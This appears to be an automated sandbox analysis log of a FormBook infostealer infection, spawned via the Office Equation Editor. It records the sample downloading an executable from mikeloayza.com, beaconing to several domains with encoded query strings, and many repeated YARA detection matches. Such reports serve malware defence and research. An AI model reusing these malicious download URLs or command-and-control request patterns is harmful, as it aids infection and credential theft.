          Source: explorer.exe, 00000006.00000000.501623480.0000000008405000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.552496402.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.550045883.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htmJump to behavior
          Source: unknownDNS traffic detected: queries for: mikeloayza.com
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: mikeloayza.com
          Source: global trafficHTTP traffic detected: GET /E9/i4L.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mikeloayza.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1Host: www.fisioletsgo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1Host: www.bitcointradel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1Host: www.executive-air.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1Host: www.luckyfandom.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownHTTPS traffic detected: 131.153.37.4:443 -> 192.168.2.22:49168 version: TLS 1.2

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\Pcportk28.exeJump to dropped file
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00356226
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00354368
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00356C00
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00356479
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00356720
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00354968
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00358990
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_00358980
          Source: C:\Users\Public\Pcportk28.exeCode function: 4_2_009E11AB
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041C001
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00401030
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041B8C3
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041C948
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00408C80
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0041BD22
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00402D8A
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00402D90
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00402FB0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085E0C6
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0088D005
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00863040
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0087905A
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008DD06D
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085E2E9
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00901238
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_009063BF
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0085F3CF
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008863DB
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00862305
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00867353
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008AA37B
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00895485
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00871489
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E443E
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0089D47D
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E05E3
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0087C5F0
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086351F
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008A6540
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00864680
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086E6C1
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_00902622
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008AA634
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008E579A
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_0086C7BC
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008957C3
          Source: C:\Users\Public\Pcportk28.exeCode function: 5_2_008DF8C4
